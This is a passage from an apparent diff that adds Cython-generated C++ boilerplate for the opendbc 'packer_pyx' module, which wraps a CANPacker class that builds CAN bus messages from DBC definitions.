PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* None.proto */ +#include + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static std::vector __pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_pack(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_addr, PyObject *__pyx_v_values); /* proto*/ +static PyObject *__pyx_f_7opendbc_3can_10packer_pyx_9CANPacker_make_can_msg(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_name_or_addr, PyObject *__pyx_v_bus, PyObject *__pyx_v_values, int __pyx_skip_dispatch); /* proto*/ + +/* Module declarations from "libc.stdint" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libcpp.utility" */ + +/* Module declarations from "libcpp.map" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "opendbc.can.common" */ + +/* Module declarations from "opendbc.can.packer_pyx" */ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "opendbc.can.packer_pyx" +extern int __pyx_module_is_main_opendbc__can__packer_pyx; +int __pyx_module_is_main_opendbc__can__packer_pyx = 0; + +/* Implementation of "opendbc.can.packer_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_RuntimeError; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_TypeError; +/* #### Code section: string_decls ### */ +static const char __pyx_k__7[] = "?"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_bus[] = "bus"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_utf8[] = "utf8"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_values[] = "values"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_dbc_name[] = "dbc_name"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_CANPacker[] = "CANPacker"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_iteritems[] = "iteritems"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_Can_t_lookup[] = "Can't lookup "; +static const char __pyx_k_RuntimeError[] = "RuntimeError"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_make_can_msg[] = "make_can_msg"; +static const char __pyx_k_name_or_addr[] = "name_or_addr"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_CANPacker_make_can_msg[] = "CANPacker.make_can_msg"; +static const char __pyx_k_opendbc_can_packer_pyx[] = "opendbc.can.packer_pyx"; +static const char __pyx_k_CANPacker___reduce_cython[] = "CANPacker.__reduce_cython__"; +static const char __pyx_k_opendbc_can_packer_pyx_pyx[] = "opendbc/can/packer_pyx.pyx"; +static const char __pyx_k_CANPacker___setstate_cython[] = "CANPacker.__setstate_cython__"; +static const char __pyx_k_self_dbc_self_packer_cannot_be_c[] = "self.dbc,self.packer cannot be converted to a Python object for pickling"; +/* #### Code section: decls ### */ +static int __pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker___init__(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_dbc_name); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_2make_can_msg(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, PyObject *__pyx_v_name_or_addr, PyObject *__pyx_v_bus, PyObject *__pyx_v_values); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7opendbc_3can_10packer_pyx_9CANPacker_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_7opendbc_3can_10packer_pyx_CANPacker(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_7opendbc_3can_10packer_pyx_CANPacker; + #endif + PyTypeObject *__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker; + PyObject *__pyx_n_s_CANPacker; + PyObject *__pyx_n_s_CANPacker___reduce_cython; + PyObject *__pyx_n_s_CANPacker___setstate_cython; + PyObject *__pyx_n_s_CANPacker_make_can_msg; + PyObject *__pyx_kp_u_Can_t_lookup; + PyObject *__pyx_n_s_RuntimeError; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_n_s__7; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_bus; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_dbc_name; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_iteritems; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_make_can_msg; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_or_addr; + PyObject *__pyx_n_s_opendbc_can_packer_pyx; + PyObject *__pyx_kp_s_opendbc_can_packer_pyx_pyx; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_self; + PyObject *__pyx_kp_s_self_dbc_self_packer_cannot_be_c; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_u_utf8; + PyObject *__pyx_n_s_values; + PyObject *__pyx_int_0; + PyObject *__pyx_tuple_; + PyObject *__pyx_tuple__3; + PyObject *__pyx_tuple__5; + PyObject *__pyx_codeobj__2; + PyObject *__pyx_codeobj__4; + PyObject *__pyx_codeobj__6; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker); + Py_CLEAR(clear_module_state->__pyx_type_7opendbc_3can_10packer_pyx_CANPacker); + Py_CLEAR(clear_module_state->__pyx_n_s_CANPacker); + Py_CLEAR(clear_module_state->__pyx_n_s_CANPacker___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANPacker___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_CANPacker_make_can_msg); + Py_CLEAR(clear_module_state->__pyx_kp_u_Can_t_lookup); + Py_CLEAR(clear_module_state->__pyx_n_s_RuntimeError); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_n_s__7); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_bus); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_dbc_name); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_iteritems); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_make_can_msg); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_or_addr); + Py_CLEAR(clear_module_state->__pyx_n_s_opendbc_can_packer_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_opendbc_can_packer_pyx_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_kp_s_self_dbc_self_packer_cannot_be_c); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_u_utf8); + Py_CLEAR(clear_module_state->__pyx_n_s_values); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_tuple_); + Py_CLEAR(clear_module_state->__pyx_tuple__3); + Py_CLEAR(clear_module_state->__pyx_tuple__5); + Py_CLEAR(clear_module_state->__pyx_codeobj__2); + Py_CLEAR(clear_module_state->__pyx_codeobj__4); + Py_CLEAR(clear_module_state->__pyx_codeobj__6); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker); + Py_VISIT(traverse_module_state->__pyx_type_7opendbc_3can_10packer_pyx_CANPacker); + Py_VISIT(traverse_module_state->__pyx_n_s_CANPacker); + Py_VISIT(traverse_module_state->__pyx_n_s_CANPacker___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANPacker___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_CANPacker_make_can_msg); + Py_VISIT(traverse_module_state->__pyx_kp_u_Can_t_lookup); + Py_VISIT(traverse_module_state->__pyx_n_s_RuntimeError); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_n_s__7); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_bus); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_dbc_name); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_iteritems); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_make_can_msg); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_or_addr); + Py_VISIT(traverse_module_state->__pyx_n_s_opendbc_can_packer_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_opendbc_can_packer_pyx_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_dbc_self_packer_cannot_be_c); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_u_utf8); + Py_VISIT(traverse_module_state->__pyx_n_s_values); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_tuple_); + Py_VISIT(traverse_module_state->__pyx_tuple__3); + Py_VISIT(traverse_module_state->__pyx_tuple__5); + Py_VISIT(traverse_module_state->__pyx_codeobj__2); + Py_VISIT(traverse_module_state->__pyx_codeobj__4); + Py_VISIT(traverse_module_state->__pyx_codeobj__6); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_7opendbc_3can_10packer_pyx_CANPacker __pyx_mstate_global->__pyx_type_7opendbc_3can_10packer_pyx_CANPacker +#endif +#define __pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker __pyx_mstate_global->__pyx_ptype_7opendbc_3can_10packer_pyx_CANPacker +#define __pyx_n_s_CANPacker __pyx_mstate_global->__pyx_n_s_CANPacker +#define __pyx_n_s_CANPacker___reduce_cython __pyx_mstate_global->__pyx_n_s_CANPacker___reduce_cython +#define __pyx_n_s_CANPacker___setstate_cython __pyx_mstate_global->__pyx_n_s_CANPacker___setstate_cython +#define __pyx_n_s_CANPacker_make_can_msg __pyx_mstate_global->__pyx_n_s_CANPacker_make_can_msg +#define __pyx_kp_u_Can_t_lookup __pyx_mstate_global->__pyx_kp_u_Can_t_lookup +#define __pyx_n_s_RuntimeError __pyx_mstate_global->__pyx_n_s_RuntimeError +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_n_s__7 __pyx_mstate_global->__pyx_n_s__7 +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_bus __pyx_mstate_global->__pyx_n_s_bus +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_dbc_name __pyx_mstate_global->__pyx_n_s_dbc_name +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_kp_u_gc 